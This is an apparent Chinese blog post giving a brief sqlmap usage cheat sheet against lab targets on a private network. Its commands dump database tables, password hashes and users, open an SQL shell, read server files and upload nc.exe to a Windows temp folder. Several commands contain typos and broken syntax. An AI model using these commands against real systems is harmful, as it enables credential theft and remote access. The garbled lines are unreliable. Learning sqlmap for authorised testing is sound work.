Sqlmap使用

基础使用

sqlmap.py -u "http://192,168.1.104/sq11/Less-1/?id=1&uid=2 "

文本中获取请求

sqlmap.py -r desktop/1.txt

查询数据库与表

sqlmap.py -u http://192.168.1.104/sql1/Less-1/?id=1 --dbs
sqlmap.py -u http://192.168.1.104/sql1/Less-1/?id=1 --D --tabls//-D 不指定具体数据库
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --current-db //当前网站使用的数据库

获取字段与内容

sqlmap.py -u "http://192.168,1.7/sq1/union.php?id=1" -D dkeye -T user info --columns
sqlmap.py-u"http://192.168,1.7/sq1/union.php?id=1"-D dkeye -T user info --c password,usernaems --dump

查询用户与密码

sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --passwords
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --users
sqlmap.py-u "http://192.168.1.7/sql/union.php?id=1" --current-user //当前网站用户

进阶使用

设置探测等级

--level 5

运行命令

sqlmap.py -u "http://192.168.1.7/sq1/union.php?id=1” --sq1-she1

读取或上传文件

http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther"  --file-read "C:/example.exe" -v1

python sqlmap.py -u "http://192.168.136.129/sq1map/mysq1/get int.aspx?id-1"
--file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
//1. `-v 1`: 这个参数设置 sqlmap 的详细级别为 1,即显示基本信息。

posted @ 2024-07-04 23:18 Ho1d_F0rward 阅读(4) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· sql注入初识

· MSSQL注入

· Sqlmap简单用法

· sqlmap的基本使用

· sqlmap的使用

阅读排行：
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型，支持深度思考和联网搜索！
· 基于 Docker 搭建 FRP 内网穿透开源项目（很简单哒）
· 25岁的心里话
· ollama系列01：轻松3步本地部署deepseek，普通电脑可用
· 按钮权限的设计及实现

Ho1d_F0rward

Sqlmap使用

基础使用

文本中获取请求

查询数据库与表

获取字段与内容

查询用户与密码

进阶使用

设置探测等级

运行命令

读取或上传文件

公告

我的标签